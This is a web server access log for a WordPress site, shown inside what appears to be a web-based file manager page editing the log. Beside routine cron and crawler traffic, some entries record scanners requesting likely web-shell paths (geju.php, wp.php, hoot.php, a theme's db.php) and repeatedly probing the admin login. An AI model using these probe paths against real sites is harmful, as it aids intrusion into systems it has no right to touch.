芝麻web文件管理V1.00
编辑当前文件:/home/sditechnicalteam/access-logs/client.socialdigiinnovator.com-ssl_log
20.171.207.161 - - [28/May/2025:08:46:11 -0400] "GET /-.php/ HTTP/1.1" 404 8471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.161 - - [28/May/2025:08:47:42 -0400] "GET /-.php/ HTTP/1.1" 404 8471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.35 - - [28/May/2025:08:48:46 -0400] "POST /wp-cron.php?doing_wp_cron=1748436526.5999510288238525390625 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
20.171.207.161 - - [28/May/2025:08:48:45 -0400] "GET /-.php/ HTTP/1.1" 404 8471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.35 - - [28/May/2025:08:50:29 -0400] "POST /wp-cron.php?doing_wp_cron=1748436629.8714749813079833984375 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
20.171.207.161 - - [28/May/2025:08:50:25 -0400] "GET /-.php/ HTTP/1.1" 404 8472 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.35 - - [28/May/2025:08:51:01 -0400] "POST /wp-cron.php?doing_wp_cron=1748436661.5680770874023437500000 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:08:22:55 -0400] "POST /wp-cron.php?doing_wp_cron=1748434975.1196091175079345703125 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
20.171.207.161 - - [28/May/2025:08:22:50 -0400] "GET /-.php/ HTTP/1.1" 404 8471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.35 - - [28/May/2025:08:45:41 -0400] "POST /wp-cron.php?doing_wp_cron=1748436341.3580060005187988281250 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
20.171.207.161 - - [28/May/2025:08:45:38 -0400] "GET /-.php/ HTTP/1.1" 404 8472 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.35 - - [28/May/2025:08:48:00 -0400] "POST /wp-cron.php?doing_wp_cron=1748436479.9321520328521728515625 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
20.171.207.161 - - [28/May/2025:08:49:02 -0400] "GET /-.php/ HTTP/1.1" 404 8471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.161 - - [28/May/2025:08:51:00 -0400] "GET /-.php/ HTTP/1.1" 404 8471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.35 - - [28/May/2025:09:07:05 -0400] "POST /wp-cron.php?doing_wp_cron=1748437624.3831529617309570312500 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
40.77.167.151 - - [28/May/2025:09:06:53 -0400] "GET /?56b0portagesbfc4608976_htm HTTP/1.1" 200 9218 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
43.173.1.69 - - [28/May/2025:11:07:29 -0400] "GET / HTTP/1.1" 200 9188 "http://client.socialdigiinnovator.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:11:07:33 -0400] "POST /wp-cron.php?doing_wp_cron=1748444852.8182189464569091796875 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.166.142.76 - - [28/May/2025:11:22:08 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
3.95.156.106 - - [28/May/2025:11:25:16 -0400] "GET / HTTP/1.1" 200 9190 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36"
198.54.114.35 - - [28/May/2025:11:30:29 -0400] "POST /wp-cron.php?doing_wp_cron=1748446229.5056231021881103515625 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:11:25:25 -0400] "POST /wp-cron.php?doing_wp_cron=1748445924.8737990856170654296875 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.157.148.38 - - [28/May/2025:11:30:25 -0400] "GET /onboarding/ HTTP/1.1" 200 8589 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.133.91.48 - - [28/May/2025:11:43:26 -0400] "GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fonboarding%2F HTTP/1.1" 200 2167 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:11:43:30 -0400] "POST /wp-cron.php?doing_wp_cron=1748447010.7466239929199218750000 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:12:04:45 -0400] "POST /wp-cron.php?doing_wp_cron=1748448284.8143589496612548828125 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
143.198.109.239 - - [28/May/2025:12:06:41 -0400] "GET /geju.php HTTP/1.1" 404 8472 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
143.198.109.239 - - [28/May/2025:12:06:47 -0400] "GET /wp-content/plugins/about.php HTTP/1.1" 404 8472 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
143.198.109.239 - - [28/May/2025:12:06:48 -0400] "GET /wp.php HTTP/1.1" 404 8472 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
43.166.136.202 - - [28/May/2025:12:04:41 -0400] "GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fonboarding%2F&format=xml HTTP/1.1" 200 1039 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:12:06:45 -0400] "POST /wp-cron.php?doing_wp_cron=1748448405.2562019824981689453125 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
143.198.109.239 - - [28/May/2025:12:06:48 -0400] "GET /hoot.php HTTP/1.1" 404 8472 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
143.198.109.239 - - [28/May/2025:12:06:49 -0400] "GET /about.php HTTP/1.1" 404 8472 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
143.198.109.239 - - [28/May/2025:12:06:50 -0400] "GET /admin.php HTTP/1.1" 404 8472 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
198.54.114.35 - - [28/May/2025:12:21:08 -0400] "POST /wp-cron.php?doing_wp_cron=1748449268.2123889923095703125000 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:12:14:41 -0400] "POST /wp-cron.php?doing_wp_cron=1748448881.0608000755310058593750 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.153.113.127 - - [28/May/2025:12:14:38 -0400] "GET /onboarding/ HTTP/1.1" 200 8589 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.226 - - [28/May/2025:12:21:03 -0400] "GET /robots.txt HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.226 - - [28/May/2025:12:21:08 -0400] "GET /?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Frobots.txt HTTP/1.1" 200 9191 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.35 - - [28/May/2025:12:25:25 -0400] "POST /wp-cron.php?doing_wp_cron=1748449525.4950869083404541015625 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
170.106.65.93 - - [28/May/2025:12:25:20 -0400] "GET /wp-json/wp/v2/pages/542 HTTP/1.1" 200 1649 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:12:33:53 -0400] "POST /wp-cron.php?doing_wp_cron=1748450033.5114040374755859375000 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.159.152.187 - - [28/May/2025:12:33:56 -0400] "GET /onboarding/ HTTP/1.1" 200 8587 "https://client.socialdigiinnovator.com/?p=542" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.159.152.187 - - [28/May/2025:12:33:49 -0400] "GET /?p=542 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:12:45:05 -0400] "POST /wp-cron.php?doing_wp_cron=1748450705.2359709739685058593750 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.166.255.102 - - [28/May/2025:12:44:58 -0400] "GET /author/admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.255.102 - - [28/May/2025:12:45:09 -0400] "GET /?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fauthor%2Fadmin%2F HTTP/1.1" 200 9216 "https://client.socialdigiinnovator.com/author/admin/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:12:52:50 -0400] "POST /wp-cron.php?doing_wp_cron=1748451169.4666581153869628906250 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:12:57:46 -0400] "POST /wp-cron.php?doing_wp_cron=1748451466.0028040409088134765625 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
217.154.79.204 - - [28/May/2025:12:52:44 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 404 8472 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
217.154.79.204 - - [28/May/2025:12:53:05 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 404 8472 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
43.153.73.200 - - [28/May/2025:12:57:40 -0400] "GET /onboarding/embed/ HTTP/1.1" 200 8613 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.143.6 - - [28/May/2025:13:04:19 -0400] "GET / HTTP/1.1" 200 9190 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
40.77.167.72 - - [28/May/2025:13:04:44 -0400] "GET /index.php?56b0portagesbfc4608976.htm HTTP/1.1" 301 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
198.54.114.35 - - [28/May/2025:13:04:24 -0400] "POST /wp-cron.php?doing_wp_cron=1748451864.3425390720367431640625 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:13:04:45 -0400] "POST /wp-cron.php?doing_wp_cron=1748451885.4437839984893798828125 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:13:14:58 -0400] "POST /wp-cron.php?doing_wp_cron=1748452498.3715209960937500000000 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.159.149.56 - - [28/May/2025:13:14:52 -0400] "GET /wp-json/ HTTP/1.1" 200 241990 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
104.28.201.73 - - [28/May/2025:14:23:09 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "http://client.socialdigiinnovator.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
104.28.201.73 - - [28/May/2025:14:23:11 -0400] "GET /404 HTTP/1.1" 404 8472 "http://client.socialdigiinnovator.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
104.28.201.73 - - [28/May/2025:14:23:15 -0400] "GET /404 HTTP/1.1" 404 8472 "http://client.socialdigiinnovator.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
198.54.114.35 - - [28/May/2025:14:23:13 -0400] "POST /wp-cron.php?doing_wp_cron=1748456593.5779359340667724609375 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
104.28.201.73 - - [28/May/2025:14:23:15 -0400] "POST /404/wp-login.php HTTP/1.1" 302 0 "http://client.socialdigiinnovator.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
104.28.201.73 - - [28/May/2025:14:23:15 -0400] "GET /404/wp-admin/ HTTP/1.1" 404 8471 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
207.46.13.52 - - [28/May/2025:15:06:22 -0400] "GET /index.php?bdsuprapyloricbdbde58839173.htm HTTP/1.1" 301 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
198.54.114.35 - - [28/May/2025:15:06:26 -0400] "POST /wp-cron.php?doing_wp_cron=1748459185.9155790805816650390625 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
147.50.65.242 - - [28/May/2025:15:16:52 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/6.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.7.43.25 Safari/537.36"
198.54.114.35 - - [28/May/2025:15:48:36 -0400] "POST /wp-cron.php?doing_wp_cron=1748461716.0773730278015136718750 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
40.77.167.158 - - [28/May/2025:15:48:29 -0400] "GET /index.php?97e5fursea1262794.htm HTTP/1.1" 301 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
198.54.114.35 - - [28/May/2025:16:03:39 -0400] "POST /wp-cron.php?doing_wp_cron=1748462619.1525490283966064453125 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
52.167.144.168 - - [28/May/2025:16:03:33 -0400] "GET /?036ferrimetrybdfebd55609_htm HTTP/1.1" 200 9217 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
198.54.114.35 - - [28/May/2025:16:07:06 -0400] "POST /wp-cron.php?doing_wp_cron=1748462826.3518788814544677734375 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
51.68.107.156 - - [28/May/2025:16:07:02 -0400] "GET /robots.txt HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.107.156 - - [28/May/2025:16:07:07 -0400] "GET / HTTP/1.1" 302 771 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
198.54.114.35 - - [28/May/2025:16:22:17 -0400] "POST /wp-cron.php?doing_wp_cron=1748463736.6448500156402587890625 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
157.55.39.201 - - [28/May/2025:16:22:07 -0400] "GET /index.php?405nonpalatablyceebae935571.htm HTTP/1.1" 301 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
198.54.114.35 - - [28/May/2025:18:48:19 -0400] "POST /wp-cron.php?doing_wp_cron=1748472498.8337800502777099609375 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.173.1.69 - - [28/May/2025:18:48:10 -0400] "GET / HTTP/1.1" 200 9190 "http://client.socialdigiinnovator.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:19:04:10 -0400] "POST /wp-cron.php?doing_wp_cron=1748473449.7156848907470703125000 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
2602:fb54:c7c:: - - [28/May/2025:19:04:13 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:14 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:17 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:20 -0400] "GET /?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fuser%2F HTTP/1.1" 200 9203 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:20 -0400] "POST /user HTTP/1.1" 302 0 "https://client.socialdigiinnovator.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:21 -0400] "GET /?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fuser HTTP/1.1" 200 9202 "https://client.socialdigiinnovator.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:22 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:23 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fclient.socialdigiinnovator.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
198.54.114.35 - - [28/May/2025:19:02:36 -0400] "POST /wp-cron.php?doing_wp_cron=1748473355.9461579322814941406250 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.157.53.115 - - [28/May/2025:19:02:29 -0400] "GET /password-reset/ HTTP/1.1" 200 9197 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
2602:fb54:c7c:: - - [28/May/2025:19:04:02 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:06 -0400] "GET /404 HTTP/1.1" 404 8472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:13 -0400] "GET /wp-admin HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:15 -0400] "GET /404 HTTP/1.1" 404 8472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:16 -0400] "GET /admin HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:17 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:18 -0400] "GET /404 HTTP/1.1" 404 8472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:19 -0400] "GET /user HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:19 -0400] "GET /user/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
2602:fb54:c7c:: - - [28/May/2025:19:04:23 -0400] "GET /404 HTTP/1.1" 404 8471 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
198.54.114.35 - - [28/May/2025:19:21:54 -0400] "POST /wp-cron.php?doing_wp_cron=1748474514.0586919784545898437500 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
198.54.114.35 - - [28/May/2025:19:12:14 -0400] "POST /wp-cron.php?doing_wp_cron=1748473934.7771310806274414062500 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.159.143.139 - - [28/May/2025:19:12:11 -0400] "GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fclient.socialdigiinnovator.com%2F&format=xml HTTP/1.1" 200 1042 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.62.132.25 - - [28/May/2025:19:21:51 -0400] "GET /wp-json/wp/v2/pages/153 HTTP/1.1" 200 7532 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:19:32:44 -0400] "POST /wp-cron.php?doing_wp_cron=1748475164.2066190242767333984375 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.157.170.126 - - [28/May/2025:19:32:40 -0400] "GET /register/ HTTP/1.1" 200 9228 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:19:52:23 -0400] "POST /wp-cron.php?doing_wp_cron=1748476342.8193581104278564453125 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.157.82.252 - - [28/May/2025:19:52:15 -0400] "GET /wp-json/wp/v2/pages/158 HTTP/1.1" 200 3337 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.35 - - [28/May/2025:19:42:55 -0400] "POST /wp-cron.php?doing_wp_cron=1748475775.5514359474182128906250 HTTP/1.1" 200 0 "-" "WordPress/6.8.1; https://client.socialdigiinnovator.com"
43.130.105.21 - - [28/May/2025:19:42:51 -0400] "GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fclient.socialdigiinnovator.com%2F HTTP/1.1" 200 2128 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.52.250 - - [28/May/2025:20:03:37 -0400] "GET /?p=158 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
